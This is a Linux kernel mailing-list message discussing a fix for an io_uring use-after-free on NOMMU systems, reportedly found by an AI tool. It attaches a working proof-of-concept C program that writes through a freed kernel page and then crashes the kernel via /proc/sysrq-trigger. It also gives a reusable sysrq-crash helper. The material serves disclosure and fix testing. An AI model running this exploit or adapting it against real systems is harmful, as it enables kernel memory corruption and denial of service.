From: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
To: Jens Axboe <axboe@kernel.dk>
Cc: io-uring@vger.kernel.org
Subject: Re: [PATCH] io_uring: take page references for NOMMU pbuf_ring mmaps
Date: Tue, 21 Apr 2026 18:01:36 +0200
Message-ID: <2026042140-arrogance-freehand-d8bd@gregkh>
In-Reply-To: <2026042108-fiscally-unglazed-56c7@gregkh>
[-- Attachment #1: Type: text/plain, Size: 2025 bytes --]
On Tue, Apr 21, 2026 at 03:55:38PM +0200, Greg Kroah-Hartman wrote:
> On Tue, Apr 21, 2026 at 07:50:32AM -0600, Jens Axboe wrote:
> > On 4/21/26 7:46 AM, Greg Kroah-Hartman wrote:
> > > Note, I have no way of testing this, I'm only forwarding this on because
> > > I got the bug report and was able to generate something that "seems"
> >
> > AI bug report I presume? Because I can't imagine anyone ever attempted
> > to run this.
>
> Yes, I got a bunch of "non-mmu" bug reports, which is a bit odd but I
> guess you can do that with qemu these days? I should dig into that,
> maybe that way I can test this and get a reproducer for you. If not,
> let's just bin the thing.
>
> > > correct, but it might be a total load of crap here, my knowledge of the
> > > vm layer is very low so take this for where it is coming from (i.e. a
> > > non-deterministic pattern matching system.)
> > >
> > > I do have another patch that just disables io_uring for !MMU systems, if
> > > you want that instead? Or is this feature something that !MMU devices
> > > actually care about?
> >
> > I mean, who really cares about !MMU in the first place, we should just
> > kill that off with a passion.
> >
> > Let me take a closer look at this and bounce it past some vm people, my
> > nommu knowledge is close to zero as it's never been relevant in my
> > professional life time. Which is saying something...
>
> Let me try to get a reproducer going first, let's not waste any more
> human time on this just yet, sorry for sending this out without that
> done first...
Ok, attached is a poc.c and a script to run it. If you run this on a
7.0 kernel today, it "should" crash, and then if you apply the patch it
doesn't (or at least that's what happened in my testing.)
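For anyone who wants the expected before/after difference without
opening the attachment, here is a toy user-space model of the
refcounting that the header comment in poc.c describes. None of this is
kernel code: struct toy_page, toy_get_page(), toy_put_page() and
toy_page_survives_unregister() are made-up names for illustration, and
the model assumes the region holds exactly one reference, as the PoC
comment states.

```c
#include <assert.h>
#include <stdbool.h>

/* Toy stand-in for struct page: a reference count and a freed flag. */
struct toy_page {
	int refcount;
	bool freed;
};

/* Take one extra reference on a page that is still allocated. */
static void toy_get_page(struct toy_page *p)
{
	assert(!p->freed);
	p->refcount++;
}

/* Drop one reference; the page is "freed" when the count hits zero. */
static void toy_put_page(struct toy_page *p)
{
	assert(p->refcount > 0);
	if (--p->refcount == 0)
		p->freed = true;
}

/*
 * Register a ring (the region holds one reference), mmap it, then
 * unregister. Returns true if the page is still allocated afterwards,
 * i.e. the user's mapping still points at a live page.
 */
static bool toy_page_survives_unregister(bool mmap_takes_ref)
{
	struct toy_page page = { .refcount = 1, .freed = false };

	if (mmap_takes_ref)
		toy_get_page(&page);	/* the behaviour the patch adds */

	toy_put_page(&page);		/* unregister drops the region's ref */
	return !page.freed;
}
```

Calling toy_page_survives_unregister(false) models the unpatched path,
where the mapping outlives the page; passing true models the patched
path, where the extra reference keeps the page allocated.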
Note, I have run this locally and it seems to work, but be careful, I
can't guarantee anything. It does seem quite odd in that it "crashes"
the kernel with a sysrq call to show "proof". Although that is a cool
trick, I need to remember that...
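So that the trick is easier to reuse outside of nolibc, here is a
minimal sketch of it as a standalone helper for a normal libc build.
The name sysrq_write() and its path parameter are my own invention; the
path is only a parameter so the helper can be tried against a scratch
file instead of the real /proc/sysrq-trigger.

```c
#include <assert.h>
#include <fcntl.h>
#include <unistd.h>

/*
 * Write one sysrq command character to `path`.
 * Returns 0 on success and -1 if the file cannot be opened or the
 * single byte cannot be written.
 */
static int sysrq_write(const char *path, char cmd)
{
	ssize_t n;
	int fd;

	assert(path != NULL);

	fd = open(path, O_WRONLY);
	if (fd < 0)
		return -1;

	n = write(fd, &cmd, 1);
	close(fd);

	return n == 1 ? 0 : -1;
}
```

The PoC does the equivalent of sysrq_write("/proc/sysrq-trigger", 'c')
when it runs as init, which needs CONFIG_MAGIC_SYSRQ=y and a mounted
/proc. Only point it at the real file on a machine you are happy to
crash.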
thanks,
greg k-h
[-- Attachment #2: poc.c --]
[-- Type: text/plain, Size: 6740 bytes --]
// SPDX-License-Identifier: GPL-2.0
/*
 * PoC for ANT-2026-02884: io_uring NOMMU pbuf_ring page use-after-free.
 * Secondary: ANT-2026-02650 (duplicate vm_start) shares the same root
 * cause but hits a mm/nommu.c BUG_ON that the fix does not address;
 * this PoC targets 02884.
 *
 * Fixed by commit b4190296e84b ("io_uring: take page references for
 * NOMMU pbuf_ring mmaps").
 *
 * Mechanism
 * ---------
 * Under !CONFIG_MMU, io_uring_get_unmapped_area() returns the kernel
 * virtual address of the io_mapped_region's backing pages directly and
 * io_uring_mmap() takes no page references. IORING_UNREGISTER_PBUF_RING
 *   -> io_put_bl()
 *     -> io_free_region()
 *       -> release_pages()
 * therefore drops the only reference and the page returns to the buddy
 * allocator while the user's VMA still has vm_start pointing into it.
 * The user can read/write whatever the allocator hands out next.
 *
 * Detection: write a canary to the mmap'd page, unregister, re-read.
 * Boot with init_on_free=1 so freed pages are zeroed; on a vulnerable
 * kernel the canary becomes 0x00. On a fixed kernel io_uring_mmap()
 * holds a get_page reference, release_pages() leaves refcount >= 1,
 * the page is not freed, and the canary survives.
 *
 * On detection, demonstrate the write-after-free (re-allocate the page
 * inside the kernel and observe it via the dangling pointer), then
 * sysrq-crash so the qemu console shows an unambiguous kernel panic.
 *
 * Build (riscv64 nommu, nolibc, BINFMT_ELF_FDPIC loadable):
 *   make -C linux ARCH=riscv O=$PWD/build-nommu headers
 *   clang --target=riscv64-unknown-linux-gnu -march=rv64imac -mabi=lp64 \
 *     -mno-relax -static-pie -nostdlib -fno-stack-protector \
 *     -fno-builtin -isystem build-nommu/usr/include \
 *     -Ilinux/tools/include/nolibc -O2 -o poc poc.c \
 *     -fuse-ld=lld -Wl,--no-dynamic-linker -Wl,-N
 *
 * -isystem MUST come before nolibc so <asm/unistd.h> resolves to riscv,
 * not the host's; -Wl,-N forces a single PT_LOAD so the FDPIC loader
 * (which does not apply R_RISCV_RELATIVE) doesn't split text/data.
 *
 * Run as init under qemu-system-riscv64 -M virt -bios none.
 * Required: CONFIG_MMU=n, CONFIG_IO_URING=y, CONFIG_MAGIC_SYSRQ=y,
 * boot with init_on_free=1.
 */

/*
 * binfmt_elf_fdpic's initial stack layout is not the SysV layout that
 * nolibc's crt.h _start_c() expects; the auxv walk runs off into
 * garbage. We don't need argc/argv/envp, so suppress crt.h and supply
 * a minimal _start_c that just calls main. arch-riscv.h still provides
 * the asm _start that calls _start_c.
 */
#define _NOLIBC_CRT_H
char **environ;
const unsigned long *_auxv;
#include "nolibc.h"

int main(void);

void _start_c(long *sp)
{
	(void)sp;
	exit(main());
}

#define __NR_io_uring_setup 425
#define __NR_io_uring_register 427
#define IORING_REGISTER_PBUF_RING 22
#define IORING_UNREGISTER_PBUF_RING 23
#define IORING_OFF_PBUF_RING 0x80000000ULL
#define IORING_OFF_PBUF_SHIFT 16
#define IOU_PBUF_RING_MMAP 1
#define PAGE_SIZE 4096
#define CANARY 0x55

struct io_sqring_offsets {
	uint32_t head, tail, ring_mask, ring_entries, flags, dropped, array;
	uint32_t resv1;
	uint64_t user_addr;
};

struct io_cqring_offsets {
	uint32_t head, tail, ring_mask, ring_entries, overflow, cqes, flags;
	uint32_t resv1;
	uint64_t user_addr;
};

struct io_uring_params {
	uint32_t sq_entries, cq_entries, flags, sq_thread_cpu, sq_thread_idle;
	uint32_t features, wq_fd, resv[3];
	struct io_sqring_offsets sq_off;
	struct io_cqring_offsets cq_off;
};

struct io_uring_buf_reg {
	uint64_t ring_addr;
	uint32_t ring_entries;
	uint16_t bgid;
	uint16_t flags;
	uint64_t resv[3];
};

static int io_uring_setup(unsigned entries, struct io_uring_params *p)
{
	return my_syscall2(__NR_io_uring_setup, entries, p);
}

static int io_uring_register(int fd, unsigned op, void *arg, unsigned nr)
{
	return my_syscall4(__NR_io_uring_register, fd, op, arg, nr);
}

static void die(const char *what, long ret)
{
	printf("[-] %s: %ld\n", what, ret);
	if (getpid() == 1) {
		reboot(LINUX_REBOOT_CMD_POWER_OFF);
	}
	exit(1);
}

static void crash_kernel(void)
{
	int fd = open("/proc/sysrq-trigger", O_WRONLY);

	if (fd >= 0)
		write(fd, "c", 1);
	/* sysrq disabled or /proc missing: clean exit so qemu log is
	 * still parseable. */
	reboot(LINUX_REBOOT_CMD_POWER_OFF);
}

int main(void)
{
	struct io_uring_params p;
	struct io_uring_buf_reg reg;
	volatile unsigned char *ring;
	int fd, ret, i, dirty;

	if (getpid() == 1) {
		mkdir("/proc", 0555);
		mount("proc", "/proc", "proc", 0, NULL);
	}

	memset(&p, 0, sizeof(p));
	fd = io_uring_setup(8, &p);
	if (fd < 0)
		die("io_uring_setup", fd);

	memset(&reg, 0, sizeof(reg));
	reg.ring_entries = 8;
	reg.bgid = 0;
	reg.flags = IOU_PBUF_RING_MMAP;
	ret = io_uring_register(fd, IORING_REGISTER_PBUF_RING, &reg, 1);
	if (ret < 0)
		die("REGISTER_PBUF_RING", ret);

	ring = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fd,
		    IORING_OFF_PBUF_RING | (0ULL << IORING_OFF_PBUF_SHIFT));
	if (ring == MAP_FAILED)
		die("mmap PBUF_RING", (long)ring);
	printf("[*] pbuf_ring page mmap()ed at %p\n", ring);

	for (i = 0; i < PAGE_SIZE; i++)
		ring[i] = CANARY;

	memset(&reg, 0, sizeof(reg));
	reg.bgid = 0;
	ret = io_uring_register(fd, IORING_UNREGISTER_PBUF_RING, &reg, 1);
	if (ret < 0)
		die("UNREGISTER_PBUF_RING", ret);

	printf("[*] unregistered; canary[0..3] = %02x %02x %02x %02x\n",
	       ring[0], ring[1], ring[2], ring[3]);

	dirty = 0;
	for (i = 0; i < PAGE_SIZE; i++)
		if (ring[i] != CANARY)
			dirty++;

	if (!dirty) {
		printf("[+] OK: canary intact - mmap holds page reference, "
		       "fix is applied\n");
		munmap((void *)ring, PAGE_SIZE);
		close(fd);
		if (getpid() == 1)
			reboot(LINUX_REBOOT_CMD_POWER_OFF);
		return 0;
	}

	printf("[!] VULNERABLE: %d/%d canary bytes clobbered after unregister "
	       "(ring[0]=%02x, expected %02x) - page was freed under live mmap\n",
	       dirty, PAGE_SIZE, ring[0], CANARY);

	/*
	 * Demonstrate write-after-free: scribble through the dangling
	 * mapping, then make the kernel allocate a fresh page. The pcp
	 * freelist is LIFO, so the just-freed page is handed straight
	 * back; we can observe the kernel's writes through our pointer.
	 */
	for (i = 0; i < PAGE_SIZE; i++)
		ring[i] = 0x41;

	memset(&reg, 0, sizeof(reg));
	reg.ring_entries = 8;
	reg.bgid = 1;
	reg.flags = IOU_PBUF_RING_MMAP;
	ret = io_uring_register(fd, IORING_REGISTER_PBUF_RING, &reg, 1);
	printf("[!] sprayed 0x41, re-registered bgid=1 (ret=%d); "
	       "ring[0..3] now %02x %02x %02x %02x - kernel reused the page\n",
	       ret, ring[0], ring[1], ring[2], ring[3]);

	printf("[!] triggering sysrq crash\n");
	if (getpid() == 1)
		crash_kernel();
	return 1;
}
[-- Attachment #3: run-poc.sh --]
[-- Type: application/x-sh, Size: 2871 bytes --]
Thread overview: 20+ messages
2026-04-21 13:46 [PATCH] io_uring: take page references for NOMMU pbuf_ring mmaps Greg Kroah-Hartman
2026-04-21 13:50 ` Jens Axboe
2026-04-21 13:55 ` Greg Kroah-Hartman
2026-04-21 14:02 ` Jens Axboe
2026-04-21 16:01 ` Greg Kroah-Hartman [this message]
2026-04-21 16:05 ` Jens Axboe
2026-04-21 16:21 ` Jens Axboe
2026-04-21 16:24 ` Greg Kroah-Hartman
2026-04-21 16:41 ` Jens Axboe
2026-04-21 17:04 ` Jens Axboe
2026-04-21 17:38 ` Jens Axboe
2026-04-21 17:39 ` Jens Axboe
2026-04-22 1:17 ` Jens Axboe
2026-04-22 1:56 ` Jens Axboe
2026-04-22 2:26 ` Jens Axboe
2026-04-22 5:36 ` Greg Kroah-Hartman
2026-04-22 8:11 ` Greg Kroah-Hartman
2026-04-22 12:40 ` Jens Axboe
2026-04-22 13:03 ` Greg Kroah-Hartman
2026-04-22 13:06 ` Jens Axboe